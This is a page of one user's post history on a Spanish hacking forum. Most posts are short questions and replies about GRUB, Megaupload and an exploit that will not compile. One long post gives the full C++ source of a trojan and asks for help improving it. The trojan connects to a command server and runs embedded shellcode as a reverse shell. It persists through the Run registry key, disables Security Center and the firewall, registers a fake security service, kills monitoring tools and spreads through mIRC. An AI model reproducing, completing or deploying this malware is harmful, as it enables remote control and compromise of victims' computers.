elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9
41  Seguridad Informática / Hacking / Re: Monitorear el pc de mi hija. en: 1 Abril 2012, 17:01 pm
Puedes utilizar este programa Italc te dejo la pagina web.Espero haberte ayudado :)

-http://italc.sourceforge.net/
42  Seguridad Informática / Análisis y Diseño de Malware / Quiero que opinen sobre el virus en C++ y me ayuden a mejorarlo en: 13 Marzo 2012, 21:21 pm
Este es el codigo:
Código
  1.  
  2. /*
  3.    Autor: Coded by Black Ghost
  4.    Lenguaje: C/C++ Win32
  5.    Name: Black ghost
  6.    Ejecutable: Blackghost.
  7.  
  8. */
  9.  
  10. #include <windows.h>
  11. #include <stdio.h>
  12. #include <string.h>
  13. #include <winsock.h>
  14. #include <stdlib.h>
  15. #include <process.h>
  16. #include <winbase.h>
  17. //#include <sys\types.h>
  18. #include <tlhelp32.h>
  19.  
  20. #define CM_PRUEBA 101
  21. #define CM_SALIR 102
  22.  
  23. #pragma comment(lib, "wsock32.lib")
  24.  
  25.  
  26. // SOCKET PRINCIPAL
  27. SOCKET sck;
  28. char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
  29. char SeCent[] = "net stop \"Security Center\"";
  30. char Shared[] = "net stop \"SharedAccess\"";
  31. char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
  32. char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
  33. char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";
  34.  
  35. LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);
  36.  
  37. // PAYLOAD
  38. unsigned char payload[] =
  39.  
  40. "\x33\xc9\x83\xe9\xb8\xe8"
  41. "\xff\xff\xff\xff"
  42. "\xc0\x5e\x81\x76\x0e\x4a"
  43. "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
  44. "\x73\xf4\xa2\xde\x67\x46"
  45. "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
  46. "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
  47. "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
  48. "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
  49. "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
  50. "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
  51. "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
  52. "\x8b\x15\x73\x67\x69" // w0w
  53. "\x22\xec\x75\x45\x71\x77\x67"
  54. "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
  55. "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
  56. "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
  57. "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
  58. "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
  59. "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
  60. "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
  61. "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
  62. "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
  63. "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
  64. "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
  65. "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
  66. "\xa8\x54\xcb\x46\x9c"  // c0d3d
  67. "\xd8\x48\xb9\x90\x90\x90";
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74. //ListaProcesos
  75. char *proc_list[]={
  76. "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
  77. "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
  78.     "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
  79. "regedit.exe", "reg.exe" };
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89. // Thread Struct
  90.  
  91. typedef struct thread_struct
  92. {
  93. char name[250];
  94. HANDLE Thread_Handle;
  95. int id;
  96. } thread;
  97.  
  98. thread threads[10];
  99.  
  100.  
  101.  
  102.  
  103.  
  104. int Comando(char recibido[130]);
  105. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  106. void Esconder(void);
  107. void Reverse(void);
  108.  
  109.  
  110. DWORD WINAPI pcInfo(LPVOID param);
  111. DWORD WINAPI ownMirc(LPVOID param);
  112. DWORD WINAPI Pong(LPVOID param);
  113. DWORD WINAPI keyLogger(LPVOID param);
  114. DWORD WINAPI revShell(LPVOID param);
  115. DWORD WINAPI Infectar(LPVOID param);
  116. DWORD WINAPI winFuck(LPVOID param);
  117. DWORD WINAPI Happy(LPVOID param);
  118.  
  119.  
  120. int Comando(char recibido[130]);
  121. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  122. void Esconder(void);
  123. void Reverse(void);
  124. /*int main(void);*/
  125. DWORD WINAPI pcInfo(LPVOID param);
  126. DWORD WINAPI ownMirc(LPVOID param);
  127. //DWORD WINAPI Pong(LPVOID param);
  128. DWORD WINAPI revShell(LPVOID param);
  129. DWORD WINAPI SendProcess(LPVOID param);
  130. DWORD WINAPI winFuck(LPVOID param);
  131. DWORD WINAPI Happy(LPVOID param);
  132. DWORD WINAPI CallChat(LPVOID param);
  133.  
  134. /*
  135. int main(int argc, char *argv[])
  136. {
  137. char bof[25];
  138. strcpy(bof, argv[1]);
  139. return 0;
  140. }
  141. */
  142.  
  143.  
  144. // INDEX
  145.  
  146. int main(void)
  147. {
  148.    HANDLE hThread;
  149. DWORD id;
  150. WSADATA wsa;
  151.    struct sockaddr_in mysock;
  152. char recvbuff[130];
  153. char *hello = "HEllO";
  154.  
  155. WSAStartup(MAKEWORD(1, 0), &wsa);
  156. sck = socket(AF_INET, SOCK_STREAM, 0);
  157. Esconder();
  158. mysock.sin_family = AF_INET;
  159. mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
  160. mysock.sin_port = htons(80);
  161. memset(&(mysock.sin_zero), '\0', 8);
  162. //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
  163. connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
  164. send(sck, hello, strlen(hello), 0);
  165. for(;;)
  166. {
  167. if(recv(sck, recvbuff, 128, 0)>2)
  168. {
  169.      Comando(recvbuff);
  170. }
  171. Sleep(800);
  172. }
  173.  
  174.    Sleep(1000);
  175. WSACleanup();
  176. system("PAUSE");
  177. return 1;
  178. }
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185. int Comando(char recibido[130])
  186. {
  187.  
  188. HANDLE hThread;
  189. DWORD id;
  190.  
  191. char *pString;
  192.  
  193. pString = strchr(recibido, '!');
  194. if(pString==NULL)
  195. {
  196. printf("error");
  197. return -1;
  198. }
  199.  
  200. pString++;
  201.  
  202. if(strncmp(pString, "info", 4)==0)
  203. {
  204. hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
  205. CrearThread("INFO", hThread, id);
  206. Sleep(1000);
  207. }
  208.  
  209. if(strncmp(pString, "mirc", 4)==0)
  210. {
  211. hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
  212. CrearThread("MIRC", hThread, id);
  213. }
  214.  
  215. if(strncmp(pString, "exit", 4)==0)
  216. {
  217. closesocket(sck);
  218. WSACleanup();
  219. system("taskkill /F /IM viktroy.exe");
  220. }
  221.  
  222. if(strncmp(pString, "shell", 4)==0)
  223. {
  224. hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
  225. CrearThread("SHELL", hThread, id);
  226. }
  227.  
  228. if(strncmp(pString, "busca", 5)==0)
  229. {
  230. hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
  231. CrearThread("SHRC", hThread, id);
  232. }
  233.  
  234. if(strncmp(pString, "winfuck", 7)==0)
  235. {
  236. hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
  237. CrearThread("FUCK", hThread, id);
  238. }
  239.  
  240. if(strncmp(pString, "showcmd", 7)==0)
  241. {
  242. HWND hWnd;
  243.    hWnd = FindWindow("ConsoleWindowClass", NULL);
  244.    ShowWindow(hWnd, SW_SHOWNORMAL);
  245. }
  246.  
  247. if(strncmp(pString, "hidecmd", 7)==0)
  248. {
  249. HWND hWnd;
  250.    hWnd = FindWindow("ConsoleWindowClass", NULL);
  251.    ShowWindow(hWnd, SW_HIDE);
  252. }
  253.  
  254. if(strncmp(pString, "happy", 5)==0)
  255. {
  256. hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
  257. CrearThread("HAPPY", hThread, id);
  258. }
  259.  
  260. if(strncmp(pString, "chat", 4)==0)
  261. {
  262. hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
  263. CrearThread("CHAT", hThread, id);
  264. }
  265.  
  266. if(strncmp(pString, "infectar", 8)==0)
  267. {
  268.      system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
  269.    }
  270.  
  271.  
  272. return 0;
  273.  
  274. }
  275.  
  276.  
  277.  
  278. void Reverse(void)
  279. {
  280.  void(*rever)();
  281.  *(int *)&rever = (int)payload;
  282.  rever();
  283.  
  284. }
  285.  
  286. // Not ShellCode Call
  287. /* PROCESS_INFORMATION pinfo;
  288. STARTUPINFO sinfo;
  289. SOCKET rsck;
  290. //WSADATA wsadata;
  291.     struct sockaddr_in rSock;
  292.     memset(&sinfo,0,sizeof(sinfo));
  293. //WSAStartup(MAKEWORD(1, 0), &wsadata);
  294. rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  295. rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
  296. rSock.sin_family = AF_INET;
  297.     bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
  298. rSock.sin_port = htons(666);
  299. memset(&(rSock.sin_zero), 0, 8);
  300.  
  301. connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
  302. sinfo.cb = sizeof(sinfo);
  303. sinfo.dwFlags = STARTF_USESTDHANDLES;
  304. sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
  305. CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);
  306.  
  307.   */
  308.  
  309.  
  310.  
  311. // ThreadGen
  312. int CrearThread(char *name, HANDLE Thread_Handle, int id)
  313. {
  314. int c = rand()%10;
  315. sprintf(threads[c].name,name);
  316. threads[c].id = id;
  317. threads[c].Thread_Handle = Thread_Handle;
  318. return c;
  319. }
  320.  
  321.  
  322. // HIDE
  323. void Esconder(void)
  324. {
  325. HWND hWnd;
  326. hWnd = FindWindow("ConsoleWindowClass", NULL);
  327. ShowWindow(hWnd, SW_HIDE);
  328. }
  329.  
  330.  
  331. // Arquitectura
  332. DWORD WINAPI pcInfo(LPVOID param)
  333. {
  334. SYSTEM_INFO sysinfo;
  335.    char allinfo[16];
  336. GetSystemInfo(&sysinfo);
  337. if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
  338. {
  339. strcat(allinfo, "Soy un INTEL ");
  340. if(sysinfo.wProcessorLevel==3)
  341. {
  342. strcat(allinfo, "!386 ");
  343. }
  344.  
  345. else if(sysinfo.wProcessorLevel==4)
  346. {
  347. strcat(allinfo, "!486 ");
  348. }
  349.  
  350. else if(sysinfo.wProcessorLevel==5)
  351. {
  352. strcat(allinfo, "Pentium ");
  353. }
  354.  
  355. else { strcat(allinfo, "unknow "); }
  356.  
  357. }
  358.  
  359. else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
  360. {
  361. strcat(allinfo, "Soy un PocketPC ");
  362.  
  363. if(sysinfo.wProcessorLevel==1)
  364. {
  365. strcat(allinfo, "PPC 601 ");
  366. }
  367.  
  368. else if(sysinfo.wProcessorLevel==3)
  369. {
  370. strcat(allinfo, "PPC 601 ");
  371. }
  372.  
  373. else if(sysinfo.wProcessorLevel==20)
  374. {
  375. strcat(allinfo, "PPC 620 ");
  376. }
  377.  
  378. }
  379.  
  380. SetComputerName("xZ-Ownk");
  381.    send(sck, allinfo, strlen(allinfo), 0);
  382. return 0;
  383.  
  384. }
  385.  
  386.  
  387. // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P
  388.  
  389. DWORD WINAPI ownMirc(LPVOID param)
  390. {
  391. HWND hWnd;
  392. char run1[] = "/run VikTroy.exe";
  393. SetForegroundWindow(hWnd);
  394.    hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
  395.           NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
  396.  
  397. SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
  398. SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
  399. Sleep(1500);
  400. return 0;
  401. }
  402.  
  403.  
  404. // Pong Conexion Thread
  405.  
  406. /*DWORD WINAPI Pong(LPVOID param)
  407. {
  408. char *pong="PONG";
  409. for(;;)
  410. {
  411. Sleep(25000);
  412. send(sck, pong, strlen(pong), 0);
  413. }
  414.  
  415. return 1;
  416. }
  417. */
  418.  
  419. // Reverse Shell Thread
  420.  
  421. DWORD WINAPI revShell(LPVOID param)
  422. {
  423.  
  424.  
  425.    Reverse();
  426. return 0;
  427.  
  428. }
  429.  
  430.  
  431. // Tripode
  432.  
  433. DWORD WINAPI SendProcess(LPVOID param)
  434. {
  435.  
  436. HANDLE hlista;
  437. PROCESSENTRY32 proceso;
  438. char proname[30];
  439. char killer[30];
  440. int ret, i, mok;
  441.  
  442.    mok = 0;
  443.    for(;;)
  444. {
  445.  ret = 0;
  446.  i = 0;
  447.  
  448.    for(i=0;i<17;i++)
  449. {
  450.    ZeroMemory(&proceso,sizeof(proceso));
  451. proceso.dwSize = sizeof(proceso);
  452. if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
  453. {
  454. ret = Process32First(hlista,&proceso);
  455. while(ret)
  456. {
  457.  
  458. sprintf(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
  459. printf("\n%s",proname);
  460.  
  461. if(strcmp(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
  462. {
  463. send(sck, "\nEncontrado Mirc.exe\n", strlen("\nEncontrado Mirc.exe\n"), 0);
  464.    mok++;
  465. }
  466.  
  467. if(strcmp(proceso.szExeFile, proc_list[i])==0)
  468. {
  469. sprintf(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
  470. WinExec(killer, SW_HIDE);
  471. }
  472.  
  473.  
  474. ret = Process32Next(hlista,&proceso);
  475. }
  476.  
  477.   CloseHandle(hlista);
  478. }
  479. }
  480.     Sleep(100);
  481.  
  482. }
  483.  
  484. }
  485.  
  486.  
  487.  
  488. /*HKEY hKey;
  489. unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  490.     unsigned char proceso[] = "VikTroy.exe";
  491.  
  492. RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
  493. RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
  494.     RegCloseKey(hKey);*/
  495.  
  496.  
  497.  
  498.  
  499. // WINDOWS FUCKEd x"DDDDDDDDDDD
  500.  
  501. DWORD WINAPI winFuck(LPVOID param)
  502. {
  503.  
  504.  
  505.  
  506.        __asm {
  507.     mov eax, offset SeCent
  508. push eax
  509. call system
  510. pop ebx
  511. nop
  512. nop
  513.  
  514. // Security Center Off
  515.  
  516. mov eax, offset Shared
  517. push eax
  518. call system
  519. pop ebx
  520. nop
  521. nop
  522. // Shared Off
  523.  
  524.     mov eax, offset Reg1
  525. push eax
  526. call system
  527. pop ebx
  528. nop
  529. nop
  530. // Reg1 In
  531.  
  532.  
  533. mov eax, offset Reg3
  534. push eax
  535. call system
  536. pop ebx
  537. nop
  538. nop
  539.  
  540. mov  eax, offset CreateSrv
  541. push eax
  542.                 call system
  543. pop ebx
  544. nop
  545. nop
  546.  
  547. }// Reg2 In
  548.  
  549. return 0;
  550.  
  551.  
  552. }
  553.  
  554.  
  555.  
  556. // Funcion Feliz
  557.  
  558. DWORD WINAPI Happy(LPVOID param)
  559. {
  560. int a = 0;
  561.    char *Texto = " VikTroy: Simple Trojan Horse   \n"
  562.          " http://sincontrol.tomahost.org \n"
  563.  " Gm Vk Tj Pp                    \n"
  564.  " irc-hispano.org #sub_level     \n"
  565.  " by xZR !Sub_Level Security     \n";
  566.  
  567. a = MessageBox(NULL,
  568.      Texto,
  569.  "by xZR !Sub_Level",
  570.  MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  571.   for(;;)
  572.   {
  573.    if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
  574. {
  575.           a= MessageBox(NULL,
  576.                Texto,
  577.           "by xZR !Sub_Level",
  578.                        MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  579. }
  580.  
  581.  }
  582.  
  583.  return -1;
  584. }
  585.  
  586.  
  587.  
  588. // Not Avaible
  589.  
  590. DWORD WINAPI CallChat(LPVOID param)
  591. {
  592. HINSTANCE hInstance, hPrevInstance;
  593. LPSTR CmdLine;
  594. int uCmd;
  595. HWND hWnd;
  596. MSG uMsg;
  597. WNDCLASSEX wincl;
  598. SOCKET chatsock;
  599.    struct sockaddr_in chsock;
  600.  
  601. wincl.cbClsExtra = 0;
  602. wincl.cbWndExtra = 0;
  603. wincl.cbSize = sizeof(WNDCLASSEX);
  604. wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
  605. wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
  606. wincl.hIcon = LoadIcon(NULL, "icono.ico");
  607. wincl.hIconSm = LoadIcon(NULL, "icono.ico");
  608. wincl.hInstance = hInstance;
  609. wincl.lpfnWndProc = WindowProc;
  610. wincl.lpszClassName = "VentanaChat";
  611. wincl.lpszMenuName = NULL;
  612. wincl.style = CS_DBLCLKS;
  613.  
  614. RegisterClassEx(&wincl);
  615.  
  616. hWnd = CreateWindowEx(             0,
  617.                   "VentanaChat",
  618.  "Viktroy Talk",
  619.   WS_OVERLAPPEDWINDOW,
  620.   CW_USEDEFAULT,
  621.   CW_USEDEFAULT,
  622.   CW_USEDEFAULT,
  623.   CW_USEDEFAULT,
  624.    HWND_DESKTOP,
  625.                        NULL,
  626.   hInstance,
  627. NULL);
  628.  
  629. ShowWindow(hWnd, SW_SHOWDEFAULT);
  630.  
  631. while(TRUE == GetMessage(&uMsg, 0, 0, 0))
  632. {
  633.        TranslateMessage(&uMsg);
  634. DispatchMessage(&uMsg);
  635. }
  636.  
  637. return uMsg.wParam;
  638.  
  639.  
  640. }
  641.  
  642.  
  643. LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  644. {
  645. switch(uMsg)
  646. {
  647. case WM_DESTROY:
  648. PostQuitMessage(0);
  649. break;
  650. default:
  651. return DefWindowProc(hWnd, uMsg, wParam, lParam);
  652. }
  653.  
  654. return 0;
  655. }
  656.  


y por cierto me da error en esta Linea alguna ayudita?

-__asm {
43  Sistemas Operativos / Windows / Re: Problema con el Grub¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ en: 27 Febrero 2012, 14:07 pm
Ok,Gracias a todos por comentar ya me gracias al supergrub un saludo.
44  Foros Generales / Noticias / Re: SeriesYonkis y Cinetube se desploman en tráfico tras el cierre de Megaupload en: 24 Febrero 2012, 22:53 pm
Lo que no entiendo es que si subo un vídeo casero para que se lo descargue mis familiares por que me lo tiene que quitar el FBI hay mucha injusticia.
45  Foros Generales / Noticias / Re: SeriesYonkis y Cinetube se desploman en tráfico tras el cierre de Megaupload en: 24 Febrero 2012, 22:18 pm
Es que hes como si todo el trabajo de una vida te lo quitan
46  Sistemas Operativos / Windows / Problema con el Grub¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ en: 22 Febrero 2012, 21:53 pm
Hola,miren yo tengo instalado el Windows 7 y el Ubuntu el otro dia se actualizo el Windows 7 y desde entonces en el Grub solo sale Windows 7 mi pregunta es DONDE ESTA UBUNTU??
47  Seguridad Informática / Hacking / Re: No entiendo como¡¡ en: 20 Febrero 2012, 21:45 pm
El problema era que al ejecutar el programa abria como un programa oculto que mientras no lo cerraras el podría verte las cosas pero ya lo he solucionado.Gracias por responder.
48  Seguridad Informática / Hacking / No entiendo como¡¡ en: 20 Febrero 2012, 18:56 pm
El otro día había un chaval que dijo que había creado un programa con visual basic que sacaba contraseñas de tuenti, probé el programa ya que lo ha subido a Deposit Files la cuestión me lo descargue pero no iva así que le pedi al chaval del programa que me lo demostrara y me saco mi contraseña.Mi pregunta es como ha hecho ese programa con Visual Basic??
49  Seguridad Informática / Bugs y Exploits / Problema al compilar el exploit¡¡¡ en: 12 Febrero 2012, 20:01 pm
Hola miren el otro día estaba compilando el exploit SOS-10-002-pwn-isapi y cuando le di a compilar me dio el siguiente mensaje:

-exploit.c:1:20: fatal error: iostream: No such file or directory
compilation terminated.

Alguna Solución??
50  Foros Generales / Foro Libre / Re: ¿Como hago para ser un investigador de seguridad de facebook? en: 17 Enero 2012, 15:48 pm
Cuanto salido por aquiiii  :xD
Páginas: 1 2 3 4 [5] 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines